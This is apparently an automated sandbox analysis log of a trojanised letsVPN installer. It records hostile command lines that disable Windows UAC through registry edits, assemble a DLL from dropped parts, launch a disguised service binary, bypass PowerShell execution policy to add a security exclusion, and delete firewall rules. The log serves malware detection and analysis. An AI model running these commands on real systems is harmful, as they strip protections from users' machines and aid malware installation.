              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: String function: 6D0949A4 appears 54 times
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: String function: 6D08ED7E appears 109 times
              Source: s.0.drStatic PE information: No import functions for PE file found
              Source: s.0.drStatic PE information: Data appended to the last section found
              Source: letsVPN.exe, 00000000.00000003.2226012846.000000000067F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs letsVPN.exe
              Source: letsVPN.exe, 00000000.00000002.2235327158.000000000067F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs letsVPN.exe
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t reg_dword /d 0 /F
              Source: System.IO.FileSystem.AccessControl.dll.21.dr, FileSystemAclExtensions.csSecurity API names: directoryInfo.GetAccessControl
              Source: System.IO.FileSystem.AccessControl.dll.21.dr, FileSystemAclExtensions.csSecurity API names: fileInfo.SetAccessControl
              Source: System.IO.FileSystem.AccessControl.dll.21.dr, FileSystemAclExtensions.csSecurity API names: fileStream.GetAccessControl
              Source: System.IO.FileSystem.AccessControl.dll.21.dr, FileSystemAclExtensions.csSecurity API names: fileInfo.GetAccessControl
              Source: System.IO.FileSystem.AccessControl.dll.21.dr, FileSystemAclExtensions.csSecurity API names: directoryInfo.SetAccessControl
              Source: System.IO.FileSystem.AccessControl.dll.21.dr, FileSystemAclExtensions.csSecurity API names: fileStream.SetAccessControl
              Source: System.IO.Pipes.AccessControl.dll.21.dr, PipesAclExtensions.csSecurity API names: System.IO.Pipes.PipeStream.SetAccessControl(System.IO.Pipes.PipeSecurity)
              Source: System.IO.Pipes.AccessControl.dll.21.dr, PipesAclExtensions.csSecurity API names: System.IO.Pipes.PipeStream.GetAccessControl()
              Source: letsvpn-latest.exe, 00000015.00000003.2352114533.000000000310F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ".xshd;.wxs;.wxi;.wxl;.proj;.csproj;.vbproj;.ilproj;" +
              Source: letsvpn-latest.exe, 00000015.00000003.2352114533.000000000310F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <SyntaxDefinition name="XML" extensions=".xml;.xsl;.xslt;.xsd;.manifest;.config;.addin;.xshd;.wxs;.wxi;.wxl;.proj;.csproj;.vbproj;.ilproj;.booproj;.build;.xfrm;.targets;.xaml;.xpt;.xft;.map;.wsdl;.disco;.ps1xml;.nuspec" xmlns="http://icsharpcode.net/sharpdevelop/syntaxdefinition/2008">
              Source: letsvpn-latest.exe, 00000015.00000003.2352114533.000000000310F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <SyntaxDefinition name="XML" extensions=".xml;.xsl;.xslt;.xsd;.manifest;.config;.addin;.xshd;.wxs;.wxi;.wxl;.proj;.csproj;.vbproj;.ilproj;.booproj;.build;.xfrm;.targets;.xaml;.xpt;.xft;.map;.wsdl;.disco;.ps1xml;.nuspec" xmlns="http://icsharpcode.net/sharpdevelop/syntaxdefinition/2008">
              Source: letsvpn-latest.exe, 00000015.00000003.2352114533.000000000310F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c.xml;.xsl;.xslt;.xsd;.manifest;.config;.addin;.xshd;.wxs;.wxi;.wxl;.proj;.csproj;.vbproj;.ilproj;.booproj;.build;.xfrm;.targets;.xaml;.xpt;.xft;.map;.wsdl;.disco;.ps1xml;.nuspec
              Source: classification engineClassification label: mal60.spre.troj.spyw.evad.winEXE@103/291@9/12
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_0000000180003848 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,_beginthreadex,Sleep,SleepEx,CloseHandle,0_2_0000000180003848
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_000000018002A010 AdjustTokenPrivileges,0_2_000000018002A010
              Source: C:\ProgramData\letsvpn-latest.exeCode function: 21_2_0040351C EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,ExitProcess,CoUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,21_2_0040351C
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeCode function: 33_2_00007FF796191C7C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,InitiateSystemShutdownExW,33_2_00007FF796191C7C
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_6D0FE060 _wfindnext32i64,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,_invoke_watson,_getdiskfree,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,memset,GetDiskFreeSpaceA,GetLastError,_errno,19_2_6D0FE060
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_000000018000310C CoInitialize,CoImpersonateClient,CoInitializeSecurity,CLSIDFromProgID,CoCreateInstance,VariantInit,VariantInit,VariantInit,SysAllocString,SysAllocString,SysAllocString,SysAllocString,VariantClear,CoUninitialize,0_2_000000018000310C
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeCode function: 33_2_00007FF796192C44 lstrcpyW,LoadLibraryW,FindResourceW,FindResourceExW,LoadResource,LockResource,lstrlenW,lstrcpyW,FreeLibrary,CreateEventW,CreateThread,SetEvent,WaitForSingleObject,CloseHandle,CloseHandle,33_2_00007FF796192C44
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn
              Source: C:\Users\user\Desktop\letsVPN.exeFile created: C:\Users\user\AppData\Roaming\06VAP.batJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1780:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2996:120:WilError_03
              Source: C:\Windows\System32\drvinst.exeMutant created: \BaseNamedObjects\DrvInst.exe_mutex_{5B10AC83-4F13-4fde-8C0B-B85681BA8D73}
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7184:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5272:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3300:120:WilError_03
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeMutant created: \Sessions\1\BaseNamedObjects\V 4 I
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6628:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7472:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7392:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8064:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6600:120:WilError_03
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeMutant created: \Sessions\1\BaseNamedObjects\C__Program Files (x86)_letsvpn_app-3.12.0_Log_
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5160:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8108:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6528:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7864:120:WilError_03
              Source: C:\Users\user\Desktop\letsVPN.exeMutant created: \Sessions\1\BaseNamedObjects\V? 5
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7640:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8052:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2632:120:WilError_03
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Users\user\AppData\Local\Temp\nsz19AF.tmp
              Source: C:\Users\user\Desktop\letsVPN.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Roaming\06VAP.bat"
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCommand line argument: main.cc19_2_00515F90
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCommand line argument: main.cc19_2_00515F90
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCommand line argument: main.cc19_2_00515F90
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCommand line argument: main.cc19_2_00515F90
              Source: letsVPN.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorID From Win32_processor
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_Processor
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Manufacturer From Win32_Processor
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
              Source: C:\Users\user\Desktop\letsVPN.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: letsvpn-latest.exe, 00000015.00000003.2544780901.0000000003104000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2547019952.000000000310E000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2542712348.000000000310A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
              Source: letsvpn-latest.exe, 00000015.00000003.2544780901.0000000003104000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2547019952.000000000310E000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2542712348.000000000310A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
              Source: letsvpn-latest.exe, 00000015.00000003.2357553464.0000000003667000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
              Source: letsvpn-latest.exe, 00000015.00000003.2544780901.0000000003104000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2547019952.000000000310E000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2542712348.000000000310A000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2357553464.0000000003667000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
              Source: letsvpn-latest.exe, 00000015.00000003.2544780901.0000000003104000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2547019952.000000000310E000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2542712348.000000000310A000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2357553464.0000000003667000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
              Source: letsvpn-latest.exe, 00000015.00000003.2544780901.0000000003104000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2547019952.000000000310E000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2542712348.000000000310A000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2357553464.0000000003667000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
              Source: letsvpn-latest.exe, 00000015.00000003.2544780901.0000000003104000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2547019952.000000000310E000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2542712348.000000000310A000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2357553464.0000000003667000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
              Source: letsvpn-latest.exe, 00000015.00000003.2357553464.0000000003667000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
              Source: letsvpn-latest.exe, 00000015.00000003.2544780901.0000000003104000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2547019952.000000000310E000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2542712348.000000000310A000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2357553464.0000000003667000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
              Source: letsVPN.exeVirustotal: Detection: 32%
              Source: tapinstall.exeString found in binary or memory: ng of the list. When the subcommand completes, the cursor is positioned on the newly-added filter. + Add after
              Source: tapinstall.exeString found in binary or memory: positioned on the newly-added filter. ! Deletes the next occurrence of the specified filter. When the subcommand
              Source: unknownProcess created: C:\Users\user\Desktop\letsVPN.exe "C:\Users\user\Desktop\letsVPN.exe"
              Source: C:\Users\user\Desktop\letsVPN.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ipconfig /all
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /all
              Source: C:\Users\user\Desktop\letsVPN.exeProcess created: C:\Windows\System32\netsh.exe "C:\Windows\System32\netsh.exe" exec C:\ProgramData\s1qGS.xml
              Source: C:\Windows\System32\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\letsVPN.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Roaming\06VAP.bat"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t reg_dword /d 0 /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t reg_dword /d 0 /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v PromptOnSecureDesktop /t reg_dword /d 0 /F
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
              Source: C:\Users\user\Desktop\letsVPN.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c copy /b C:\ProgramData\Jm42a\Q4nO1~16\s+C:\ProgramData\Jm42a\Q4nO1~16\a C:\ProgramData\Jm42a\Q4nO1~16\base.dll
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\System32\mmc.exe C:\Windows\system32\mmc.exe -Embedding
              Source: C:\Windows\System32\mmc.exeProcess created: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exe "C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exe"
              Source: unknownProcess created: C:\Windows\System32\mmc.exe C:\Windows\system32\mmc.exe -Embedding
              Source: C:\Windows\System32\mmc.exeProcess created: C:\ProgramData\letsvpn-latest.exe "C:\ProgramData\letsvpn-latest.exe"
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ipconfig /all
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /all
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -ExecutionPolicy Bypass -File "C:\Program Files (x86)\letsvpn\AddWindowsSecurityExclusion.ps1"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" findall tap0901
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" install "C:\Program Files (x86)\letsvpn\driver\OemVista.inf" tap0901
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall
              Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\drvinst.exe DrvInst.exe "4" "0" "C:\Users\user\AppData\Local\Temp\{7c77b43b-9dea-844d-b268-70c5b13694a4}\oemvista.inf" "9" "4d14a44ff" "0000000000000160" "WinSta0\Default" "0000000000000148" "208" "c:\program files (x86)\letsvpn\driver"
              Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\drvinst.exe DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem4.inf" "oem4.inf:3beb73aff103cc24:tap0901.ndi:9.24.6.601:tap0901," "4d14a44ff" "0000000000000160"
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" findall tap0901
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=lets
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=lets
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=lets.exe
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=lets.exe
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=LetsPRO.exe
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=LetsPRO.exe
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=LetsPRO
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=LetsPRO
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=LetsVPN
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=LetsVPN
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Program Files (x86)\letsvpn\LetsPRO.exe "C:\Program Files (x86)\letsvpn\LetsPRO.exe" checkNetFramework
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeProcess created: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe "C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe" checkNetFramework
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Program Files (x86)\letsvpn\LetsPRO.exe "C:\Program Files (x86)\letsvpn\LetsPRO.exe"
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeProcess created: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe "C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe"
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s Netman
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc
              Source: unknownProcess created: C:\Windows\System32\wbem\WmiApSrv.exe C:\Windows\system32\wbem\WmiApSrv.exe
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C ipconfig /all
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /all
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C route print
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ROUTE.EXE route print
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C arp -a
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ARP.EXE arp -a
              Source: unknownProcess created: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe "C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe" /silent
              Source: C:\Users\user\Desktop\letsVPN.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ipconfig /allJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeProcess created: C:\Windows\System32\netsh.exe "C:\Windows\System32\netsh.exe" exec C:\ProgramData\s1qGS.xmlJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Roaming\06VAP.bat" Jump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c copy /b C:\ProgramData\Jm42a\Q4nO1~16\s+C:\ProgramData\Jm42a\Q4nO1~16\a C:\ProgramData\Jm42a\Q4nO1~16\base.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /allJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t reg_dword /d 0 /FJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t reg_dword /d 0 /FJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v PromptOnSecureDesktop /t reg_dword /d 0 /FJump to behavior
              Source: C:\Windows\System32\mmc.exeProcess created: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exe "C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exe" Jump to behavior
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ipconfig /allJump to behavior
              Source: C:\Windows\System32\mmc.exeProcess created: C:\ProgramData\letsvpn-latest.exe "C:\ProgramData\letsvpn-latest.exe" Jump to behavior
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -ExecutionPolicy Bypass -File "C:\Program Files (x86)\letsvpn\AddWindowsSecurityExclusion.ps1"
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" findall tap0901
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" install "C:\Program Files (x86)\letsvpn\driver\OemVista.inf" tap0901
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" findall tap0901
